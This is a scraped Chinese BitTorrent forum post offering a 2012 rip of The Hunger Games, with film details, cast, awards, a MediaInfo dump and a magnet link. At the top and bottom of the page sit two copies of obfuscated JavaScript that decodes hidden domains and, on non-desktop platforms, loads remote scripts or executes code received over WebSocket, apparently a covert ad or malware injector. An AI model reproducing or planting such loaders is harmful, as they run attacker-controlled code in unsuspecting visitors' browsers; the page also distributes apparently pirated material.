饥饿游戏[中文字幕].The.Hunger.Games.2012.BluRay.1080p.x265.10bit.MNHD 5.54GB

版主小s 1月前 210

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 饥饿游戏

◎片 名 The Hunger Games

◎年 代 2012

◎产 地 美国

◎类 别 动作 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2012-06-14(中国大陆) / 2012-03-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt1392170/

◎豆瓣评分 7.0/10 (328568人评价)

◎豆瓣链接 https://movie.douban.com/subject/3592853/

◎片 长 142分钟

◎导 演 盖瑞·罗斯 Gary Ross (id:1041302)

◎编 剧 苏珊·科林斯 Suzanne Collins (id:1302943)

比利·雷 Billy Ray (id:1295291)

盖瑞·罗斯 Gary Ross (id:1041302)

◎演 员 詹妮弗·劳伦斯 Jennifer Lawrence (id:1022616)

乔什·哈切森 Josh Hutcherson (id:1053556)

利亚姆·海姆斯沃斯 Liam Hemsworth (id:1012478)

韦斯·本特利 Wes Bentley (id:1049518)

伊丽莎白·班克斯 Elizabeth Banks (id:1004571)

斯坦利·图齐 Stanley Tucci (id:1040517)

伍迪·哈里森 Woody Harrelson (id:1053560)

伊莎贝拉·弗尔曼 Isabelle Fuhrman (id:1013784)

阿曼德拉·斯坦伯格 Amandla Stenberg (id:1320554)

薇洛·西尔德斯 Willow Shields (id:1318991)

唐纳德·萨瑟兰 Donald Sutherland (id:1010556)

亚历山大·路德韦格 Alexander Ludwig (id:1044990)

莱文·兰宾 Leven Rambin (id:1188734)

杰克·奎德 Jack Quaid (id:1321661)

斯蒂芬·考特尔 Steve Coulter (id:1336797)

杰奎琳·爱默森 Jacqueline Emerson (id:1322120)

伊恩·尼尔森 Ian Nelson (id:1332108)

拉塔莎·罗斯 Latarsha Rose (id:1428345)

卡莉·普雷斯科特 Kalia Prescott (id:1362014)

杰西卡·理查兹 Jessica Richards (id:1398735)

戴奥·奥柯奈伊 Dayo Okeniyi (id:1338290)

托比·琼斯 Toby Jones (id:1107884)

菲利普·特洛伊·林格 Phillip Troy Linger (id:1118334)

蓝尼·克罗维兹 Lenny Kravitz (id:1018065)

内尔松·阿森西奥 Nelson Ascencio (id:1051405)

麦肯兹·林茨 Mackenzie Lintz (id:1331530)

贵美子·赫尔曼 Kimiko Gelman (id:1070253)

贾德·罗德曼 Judd Lormand (id:1336037)

安东尼·雷诺兹 Anthony Reynolds (id:1045790)

德韦恩·博伊德 Dwayne Boyd (id:1224413)

罗达·格里菲丝 Rhoda Griffis (id:1094347)

桑德拉·埃利斯·拉弗蒂 Sandra Ellis Lafferty (id:1106214)

布鲁斯·邦迪 Bruce Bundy (id:1336023)

葆拉·马尔科姆森 Paula Malcomson (id:1332256)

露易斯·罗斯纳 Louise Rosner (id:1374748)

Nina Jacobson Nina Jacobson (id:1429108)

拱廊之火 Arcade Fire (id:1329917)

詹姆斯·纽顿·霍华德 James Newton Howard (id:1019135)

尤金·加尔佩里尼 Evgueni Galperine (id:1334068)

汤姆·斯特恩 Tom Stern (id:1037117)

朱迪安娜·马科夫斯基 Judianna Makovsky (id:1290783)

查德·斯塔赫斯基 Chad Stahelski (id:1154486)

史蒂文·索德伯格 Steven Soderbergh (id:1054400)

彼得·罗杰 Peter Rodger (id:1461571)

罗恩·安德达尔 Ron Underdahl (id:1414354)

雷妮·莫尼梅克 Renae Moneymaker (id:1399656)

伊恩·尼尔森 Ian Nelson (id:1332108)

◎标 签 美国 / 科幻 / 人性 / 动作 / 小说改编 / 剧情 / 2012 / 青春

◎简 介

北美洲在一场大战后被摧毁,在美国原来的废墟上,人们建立了新的家园,但新政权规定:管辖下的12个地区每年都必须进贡少年男女,参加一档电视直播节目“饥饿游戏”(Hunger Game)。节目的规则很简单——杀人或者被杀。凯妮丝Katniss Everdeen(詹妮弗·劳伦斯 Jennifer Lawrence 饰)的妹妹不幸在12区“选择日”时被选中,由于要保护妹妹,凯妮丝自告奋勇要替妹妹上场 。她不得不与心上人盖尔Gale Hawthorne(利亚姆·海姆斯沃斯 Liam Hemsworth 饰)分开,跟同时被选为12区贡品代表的皮塔Peeta Mellark(乔什·哈切森 Josh Hutcherson 饰)进入游戏。尽管凯妮丝自小就进行狩猎,拥有过人的弓箭技巧,对节目里的重重障碍都能应付自如,但她在比赛中要与残忍强壮的他区选手互相周旋,要想成为最后...

◎获奖情况 (共23项)

第70届金球奖 (2013)

电影类 最佳原创歌曲(提名)

第21届MTV电影奖 (2012)

MTV电影奖 年度电影(提名)

MTV电影奖 最佳女演员

└──詹妮弗·劳伦斯 (id:1022616)

MTV电影奖 最佳男演员

└──乔什·哈切森 (id:1053556)

MTV电影奖 突破表演奖(提名)

└──利亚姆·海姆斯沃斯 (id:1012478)

MTV电影奖 最佳吻戏(提名)

MTV电影奖 最佳打斗

MTV电影奖 最佳银幕形象转变

└──伊丽莎白·班克斯 (id:1004571)

MTV电影奖 最佳卡司阵容(提名)

MTV电影奖 最佳英雄形象(提名)

└──詹妮弗·劳伦斯 (id:1022616)

第78届纽约影评人协会奖 (2012)

最佳女主角(提名)

└──詹妮弗·劳伦斯 (id:1022616)

第18届美国评论家选择电影奖 (2013)

动作片最佳女主角

└──詹妮弗·劳伦斯 (id:1022616)

第14届美国青少年选择奖 (2012)

最佳科幻/奇幻电影

最佳科幻/奇幻电影男演员

└──乔什·哈切森 (id:1053556)

最佳科幻/奇幻电影女演员

└──詹妮弗·劳伦斯 (id:1022616)

最佳电影反派

└──亚历山大·路德韦格 (id:1044990)

最抢戏电影男星

└──利亚姆·海姆斯沃斯 (id:1012478)

最抢戏电影女星(提名)

└──伊丽莎白·班克斯 (id:1004571)

最佳银幕拍档

最佳电影吻戏

最佳电影打斗(提名)

第3届豆瓣电影鑫像奖 (2013)

鑫豆单元 最佳歌曲(提名)

鑫豆单元 最佳落选影片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 112185486310060272287101802245332853401 (0x54662384880AF4D8F85E7FA1AD82E299)

  4. Complete name : [email protected]COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.54 GiB

  8. Duration : 2 h 22 min

  9. Overall bit rate : 5 551 kb/s

  10. Movie name : The Hunger Games 2012 BluRay 1080p x265 10bit [email protected]

  11. Encoded date : UTC 2021-10-30 07:57:26

  12. Writing application : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 22 min

  21. Bit rate : 4 996 kb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.136

  31. Stream size : 4.99 GiB (90%)

  32. Title : [email protected]

  33. Writing library : x265 2.9+14-3023bd8b05c0:[Windows][GCC 8.2.1][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / no-pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=205631 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=4 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=4 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / rect / no-amp / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=3 / limit-refs=3 / limit-modes / me=3 / subme=3 / merange=57 / temporal-mvp / weightp / no-weightb / no-analyze-src-pics / deblock=0:0 / sao / no-sao-non-deblock / rd=4 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / no-b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=abr / bitrate=5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=2 / cplxblur=20.0 / qblur=0.5 / ipratio=1.40 / pbratio=1.30 / aq-mode=3 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / max-cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / multi-pass-opt-rps / scenecut-bias=0.05 / no-opt-cu-delta-qp / aq-motion / no-hdr / no-hdr-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=5 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-mv-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : AAC LC

  40. Format/Info : Advanced Audio Codec Low Complexity

  41. Codec ID : A_AAC-2

  42. Duration : 2 h 22 min

  43. Bit rate : 553 kb/s

  44. Channel(s) : 8 channels

  45. Channel layout : C L R Ls Rs Lb Rb LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 46.875 FPS (1024 SPF)

  48. Compression mode : Lossy

  49. Delay relative to video : 20 ms

  50. Stream size : 565 MiB (10%)

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : UTF-8

  57. Codec ID : S_TEXT/UTF8

  58. Codec ID/Info : UTF-8 Plain Text

  59. Duration : 2 h 12 min

  60. Bit rate : 62 b/s

  61. Count of elements : 1216

  62. Stream size : 60.1 KiB (0%)

  63. Title : CHS_ENG

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No


  67. Text #2

  68. ID : 4

  69. Format : UTF-8

  70. Codec ID : S_TEXT/UTF8

  71. Codec ID/Info : UTF-8 Plain Text

  72. Duration : 2 h 11 min

  73. Bit rate : 34 b/s

  74. Count of elements : 1082

  75. Stream size : 33.1 KiB (0%)

  76. Title : ENG

  77. Language : English

  78. Default : No

  79. Forced : No


  80. Menu

  81. 00:00:00.000 : en:Chapter 01

  82. 00:01:31.466 : en:Chapter 02

  83. 00:10:05.021 : en:Chapter 03

  84. 00:20:32.272 : en:Chapter 04

  85. 00:28:36.798 : en:Chapter 05

  86. 00:36:43.117 : en:Chapter 06

  87. 00:43:27.771 : en:Chapter 07

  88. 00:51:32.798 : en:Chapter 08

  89. 01:03:10.536 : en:Chapter 09

  90. 01:15:58.178 : en:Chapter 10

  91. 01:23:56.948 : en:Chapter 11

  92. 01:30:07.527 : en:Chapter 12

  93. 01:43:12.728 : en:Chapter 13

  94. 01:54:00.166 : en:Chapter 14

  95. 02:00:36.479 : en:Chapter 15

  96. 02:06:50.144 : en:Chapter 16




复制代码


TAGS 动作 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:9346C95219B0721A1DCA98106A9F41DF9095115F

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};